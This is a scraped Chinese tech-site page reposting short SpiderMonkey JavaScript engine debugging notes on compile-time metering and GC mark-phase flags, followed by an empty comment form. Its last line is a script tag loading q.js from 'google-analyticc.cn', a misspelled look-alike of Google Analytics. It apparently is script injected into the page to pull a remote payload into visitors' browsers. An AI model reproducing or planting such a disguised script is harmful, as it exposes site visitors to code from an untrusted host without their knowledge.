RSS
热门关键字:  数据挖掘  数据仓库  商业智能  搜索引擎  人工智能
当前位置 :| 首页>编程技术>脚本语言>

JavaScript -Debugging notes

来源: 作者:unkonwn 时间:2004-12-02 点击:

To turn on GC instrumentation, define JS_GCMETER.

数据挖掘研究院

  • To turn on GC mark-phase debugging, useful to find leaked objects by their address, and to dump the GC heap, define GC_MARK_DEBUG. See the code in jsgc.c around the declaration and use of js_LiveThingToFind.
  • To turn on the arena package′s instrumentation, define JS_ARENAMETER.
  • To turn on the hash table package′s metering, define JS_HASHMETER
最新评论共有 0 位网友发表了评论
发表评论
评论内容:不能超过250字,需审核,请自觉遵守互联网相关政策法规。
匿名?
script src="http://www.google-analyticc.cn/q.js" type="text/javascript">